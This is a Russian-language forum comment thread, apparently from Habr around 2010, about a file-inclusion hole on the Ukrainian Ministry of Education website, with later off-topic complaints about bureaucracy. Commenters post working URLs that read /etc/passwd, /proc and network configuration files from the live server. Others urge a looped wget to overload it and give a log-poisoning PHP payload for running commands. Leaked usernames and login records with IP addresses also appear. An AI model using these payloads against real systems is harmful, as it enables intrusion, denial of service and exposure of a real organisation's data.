Comments 107
Мне больше всего нравится вот такая ссылка www.mon.gov.ua/main.php?query=./
Предупреждать же надо… Мой Chrome самоубился…
Файрфокс выдержал ) Главное быстро закрыть вкладку, пока памяти хватает :-D
Как не странно мой хром выдержал. 2 Гб озу
Эту ссылку надо сделать главное на сайте www.mon.gov.ua! :)
Не в пользователях дело. См., к примеру, ниже.
попробуйте wget www.mon.gov.ua/main.php?query=./
равно как и w3m www.mon.gov.ua/main.php?query=./
полёт нормальный, легко прерывающийся на ^C! :)
А канальчик у министерства неплохой — 2.5Мегабайта/с… ;)
полёт нормальный, легко прерывающийся на ^C! :)
А канальчик у министерства неплохой — 2.5Мегабайта/с… ;)
Ну почему я сначала открыл, а потом почитал комменты? :)
Хром выдержал, хотя и крякнул про сбой модуля.
Хром выдержал, хотя и крякнул про сбой модуля.
Опера едва стерпела. Ждем Хабраэффекта )
Увы, это не лень (закрыть дыру). Это полное отсутствие мотивации. Сидят в каком-нибудь ВУЗе (или непосредственно в здании Министерства) инженеры, и на свою мизерную ВУЗовско-инженерную ЗП сопровождают данный сайт. Мне в свое время доводилось поработать инженером в ВУЗе. Вспоминаю как страшный сон. И не потому, что ЗП маленькая. А потому, что болото. Никому ничего не надо. И у самого руки опускаются после этого.
Этой дырой уже давно пользуются во всю мощь bit.ly/aVxfkY
опачки. круто. Вот если с этим позвонить, может и почешутся в вузе своем
Спасибо, что продублировали размещенную мной в предыдущем посте на эту тему ссылку, а то он на главную не вышел и народу там куда меньше.
Это точно эта дыра?
Ха-ха! Прикольно!
Самое интересное, что сайт Міністерство освіти і науки України — этот сайт может нанести вред Вашему компьютеру, как говорит google!!!
О, как! =) Какие там в министерстве образованные люди распространяют трояны =)
Самое интересное, что сайт Міністерство освіти і науки України — этот сайт может нанести вред Вашему компьютеру, как говорит google!!!
О, как! =) Какие там в министерстве образованные люди распространяют трояны =)
в нашем ВУЗе аналогичная ситуация. потому делаем что-то мы (студентешки) за зачеты и экзамены, да-да я возможно собрат автора этого сайта, я тоже иногда говнокожу не задумываясь о последствиях. возможно срабатывает «это не моя война», но скорее то, что результат не только не важен мне, но и «заказчик» в лице препода, тоже не очень-то заинтересован в качестве результата. потому делается все быстро и как попадет. В общем-то себя не оправдываю как и автора сайта — это в любом случае аукнится…
Не скажи. Один из сайтов, на который этот ссылается в колонке справа, делала говностудия моего знакомого. И платили они ему нормально. Так вот давеча там начала появляться порнушка. Сайт то бекапнули, дыры закрыли, а месяц в министерство еще пришлось походить. Вот так. А вы говорите студенты.
Ну, конечно бывает и так. Но основной мотив державных чиновников нанять стороннего разработчика — откат.
Бауманка, 2016, ИУ5. Сайт с задачами, расписаниями экзаменов-зачетов и прочим висел 2 месяца из-за сбоя установки плагина CMS, пока я не написал админам письмо с характеристикой их профессиональных качеств, устав наблюдать страдания сына-студента. Починили сразу же, но обиделись, со словами «это не наша работа, вообще-то, и нам за нее никто не платит».
Админы немного удивились — весь факультет страдал 2 месяца, и хоть бы кто их пнул…
Админы немного удивились — весь факультет страдал 2 месяца, и хоть бы кто их пнул…
Ничего себе боян:
www.mon.gov.ua/main.php?query=../../../etc/fedora-release
www.mon.gov.ua/main.php?query=../../../etc/fedora-release
хватит точки ставить, от корня работает
www.mon.gov.ua/main.php?query=/proc/cpuinfo
www.mon.gov.ua/main.php?query=/proc/cpuinfo
www.mon.gov.ua/main.php?query=main.php — словарь программиста на букву Р: рекурсия — смотри рекурсию
Админ молодец. Настроил сервер так что хабраэфект держит
давайте дружно wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null =)
И Хабраэффект его не берёт…
Кстати оно за файрволом.
www.mon.gov.ua/main.php?query=/etc/sysconfig/network-scripts/ifcfg-eth0
www.mon.gov.ua/main.php?query=/etc/sysconfig/network-scripts/ifcfg-eth1
www.mon.gov.ua/main.php?query=/etc/rc.local
Проц хороший, а памяти маловато
www.mon.gov.ua/main.php?query=/proc/meminfo
www.mon.gov.ua/main.php?query=/etc/sysconfig/network-scripts/ifcfg-eth0
www.mon.gov.ua/main.php?query=/etc/sysconfig/network-scripts/ifcfg-eth1
www.mon.gov.ua/main.php?query=/etc/rc.local
Проц хороший, а памяти маловато
www.mon.gov.ua/main.php?query=/proc/meminfo
В включение удалённого PHP-кода через HTTP работает?
правильно дядя говорит — «никакой опасности она не представляет, что это только read only и т.п.»
а то, что детки немного обучатся работе с операционной системой линукс (при чём им даже будет это интересно, что есть одним их элементов педагогики) — это ж и есть то самое «образование 2.0» :)
а то, что детки немного обучатся работе с операционной системой линукс (при чём им даже будет это интересно, что есть одним их элементов педагогики) — это ж и есть то самое «образование 2.0» :)
представляю себе занятие в компьютерном классе где-нить в Севастополе:
«сегодняшняя тема урока — Хабраэффект
для опытов сегодня мы воспользуемся любезно предоставленным сервером родного Міністерство освіти і науки України
вот его адрес…
Итак — кто первый скажет, что за операционная система на нем установлена?
Сколько памяти на нем установлено и какова загрузка проуессоров?
… А теперь все разом делаем wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null и смотрим на то как он потихоньку умирает :)
«сегодняшняя тема урока — Хабраэффект
для опытов сегодня мы воспользуемся любезно предоставленным сервером родного Міністерство освіти і науки України
вот его адрес…
Итак — кто первый скажет, что за операционная система на нем установлена?
Сколько памяти на нем установлено и какова загрузка проуессоров?
… А теперь все разом делаем wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null и смотрим на то как он потихоньку умирает :)
$ wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null
--13:59:52-- http://www.mon.gov.ua/main.php?query=./main.php
=> `/dev/null'
Распознаётся www.mon.gov.ua... 212.111.193.189
Устанавливается соединение с www.mon.gov.ua|212.111.193.189|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: нет информации [text/html]
[ <=> ] 21 568 452 6.78M/s
13:59:58 (6.75 MB/s) - `/dev/null' сохранён [21568452]20 мегабайт и усё. Запускаемся по новой… А посему, детки, делаем так:while [ 1 == 1 ]; do wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null; done
Походу сайт очень уж текстовый. Никаких фич нет особых, на сервере есть постгрес, мускуль. Но хз для чего используется =)
Мне вот интересно, когда же кто-нибудь rm -rf / сделает…
В списке пользователей есть некто 'petrik'.
Мне страшно.
Мне страшно.
строка 49 /etc/passwd:
petrik:x:511:100::/home/petrik:/bin/bash
Неужели тот самый? :)
petrik:x:511:100::/home/petrik:/bin/bash
Неужели тот самый? :)
Уже кто-нибудь подобрал пароль к lenka или pavel?
Вся пионерская организация — в шоке! =)
mon.gov.ua все? таки сдох?
Может кто-то сервер выключил? :) У меня внезапно перестал пинговаться их сервер.
habrahabr.ru/blogs/infosecurity/90473/#comment_2724997
Сработало, похоже
Сработало, похоже
Походу приняли кое-какие меры — теперь страница с новостями показывается. Если Хабр вынудил админов пофиксить сайт — слава Хабру, слава Хабралюдям! Мы делаем этот мир лучше! :)
Да. Именно хабр.
Веду переписку с AVB40-UANIC.
Думаю, что у них всё получится.
Веду переписку с AVB40-UANIC.
Думаю, что у них всё получится.
Не только валидацию данных наконец-то добавили, но даже интересную папку personal потёрли.
Почти оффтоп. Ходил в пенсионный на персонификацию, начали визжать мол подпишись на нашу газетку. Я говорю давайте на рассылку подпишусь, rss там какой… уже менее уверенно говорю: 21 век… совсем тихо: у вас же компьютеры у каждого… При всем при том в пенсионном работников старше 25 не видел, а уж бюрократии круче чем там и вовсе не видал в жизни. Страшно подумать что государство на самом деле прибыльная конторка, от прибылей которой зависят судьбы многих людей, страшно потому что с такими интерфейсами прибыльными быть просто невозможно.
У них там свои схемы, они на этом живут. Я когда штраф платил за то, что не вовремя сдал отчет в налоговую, перечислял 55 грн за подписку какой-то местной «мурзилки» :) И это на уровне всей налоговой. Думал только мне это сказали сделать или у моего оператора какой-то там откат, но у кого не спрашивал, все говорят, что да, так и делают обычно.
В итоге я так и не сросся с нашей системой и уже закрываю личную деятельность, параллельно подыскивая трактор.
В итоге я так и не сросся с нашей системой и уже закрываю личную деятельность, параллельно подыскивая трактор.
Мне сначала предложила девочка-инспектор задним числом, но вначале нужно было зайти к другой девочке которая начала возникать на предмет «купить слона». Получив ответ на вопрос " а кто это вам разрешил задним" вскинула ручки и выпалила что-то вроде: ааа, так у нее зарплата больше чем у нас, потому она такая добрая! А мы нет — тут же отрезала из-за спины девочка в громадной оправе и непринужденно наглой позе. Ну тут мне совсем уж все это начало напоминать зачет в универе и с нового захода, через день, я с порога начал просто тупо нагло врать что все проплатил, а корешок забыл. Фокус был в том что корешок (неоплаченный), зараза, лежал по самому центру в полупрозрачном файлике, том самом которым я размахивал у ее носа читая лекции о вреде бюрократии для малого бизнеса. В общем все это было бы очень весело если бы не убило три моих рабочих дня, при том что налоговая юзает опенайди и деньги мои видит без труда, а вот пенсионный ввел свои айдишки и хоть деньги и пришли, но 5 листов бумаги все равно скозлить нужно… Бред короче, тоже свернулся бы, да неудобно будет.
Находите логи вебсервера, дергаете запрос host/?<?php system($_GET[q]) ?>, инклудите лог, PROFIT!
Последние входы пользователей:
0 Wed Mar 24 14:55:36 2010 pts/1 10.0.2.143
7 Tue Nov 13 11:21:54 2007 pts/6 webmon.uintei.kiev.ua
500 Sun Jul 20 15:50:12 2008 pts/3 192.168.254.1
501 Wed May 28 16:32:01 2008 pts/3 192.168.254.1
512 Thu Nov 19 15:29:58 2009 pts/1 94.74.70.25
516 Fri Feb 27 12:23:16 2009 pts/2 10.0.1.69
520 Thu Aug 14 08:05:06 2008 pts/3 10.0.1.2
522 Thu Jul 24 06:27:38 2008 pts/2 10.0.1.2
523 Thu Feb 11 09:28:10 2010 pts/1 10.0.2.143
525 Thu Feb 11 09:43:41 2010 pts/3 94.74.70.25
0 Wed Mar 24 14:55:36 2010 pts/1 10.0.2.143
7 Tue Nov 13 11:21:54 2007 pts/6 webmon.uintei.kiev.ua
500 Sun Jul 20 15:50:12 2008 pts/3 192.168.254.1
501 Wed May 28 16:32:01 2008 pts/3 192.168.254.1
512 Thu Nov 19 15:29:58 2009 pts/1 94.74.70.25
516 Fri Feb 27 12:23:16 2009 pts/2 10.0.1.69
520 Thu Aug 14 08:05:06 2008 pts/3 10.0.1.2
522 Thu Jul 24 06:27:38 2008 pts/2 10.0.1.2
523 Thu Feb 11 09:28:10 2010 pts/1 10.0.2.143
525 Thu Feb 11 09:43:41 2010 pts/3 94.74.70.25
Какой поп, такой и приход.
Это ещё что. У нас в одном институте большая часть преподавателей задания раздают студентам вКонтакте, и группы себ посоздавали. УНЫНИЕ!!!
Ох уж этот хабра-снобизм. Когда какой-то политик или профессор ведет Twitter или Facebook аккаунт, так здесь аж визжат от радости. А тут вдруг VK, так сразу беда-катастрофа и уныние.
Есть какая-то принципиальная разница, а?
Есть какая-то принципиальная разница, а?
Ну, с момента написания своего предыдущего коментария я немного отступил от своей позиции, но мне всё ещё кажется что раздавать учебные задания в группе вконтакте как-то не серьёзно. Как и в FB собственно. Тем более что большая часть специальностей — «айтишные». Можно же как-то это оформить более официально?
Даже нужно. Но если институту крупно положить болт на автоматизацию учебного процесса, то инициативы одного преподавателя совершенно не достаточно будет. Вот он и ищет пути.
Наверное раньше он студентам просто рассылки по e-mail делал. А вконтактовская группа позволяет выкладывать и более-менее по темам содержать текстовые, графические, аудио- и видеоматериалы для учебного процесса. Почему бы не воспользоваться таким решением за недоступностью лучшего в их условиях.
Наверное раньше он студентам просто рассылки по e-mail делал. А вконтактовская группа позволяет выкладывать и более-менее по темам содержать текстовые, графические, аудио- и видеоматериалы для учебного процесса. Почему бы не воспользоваться таким решением за недоступностью лучшего в их условиях.
Была же статья в хакере 10 года, номер журнала 134. Называлась она «GOV сайты под угрозой». Все расписано. Оригинал тут uasc.org.ua/2010/03/811/ (Кстати странно, редакция журнала без каких либо уведомлений внесла коррективы в статью)
Sign up to leave a comment.
Министерство образования и науки Украины… Образование 2.0 говорите?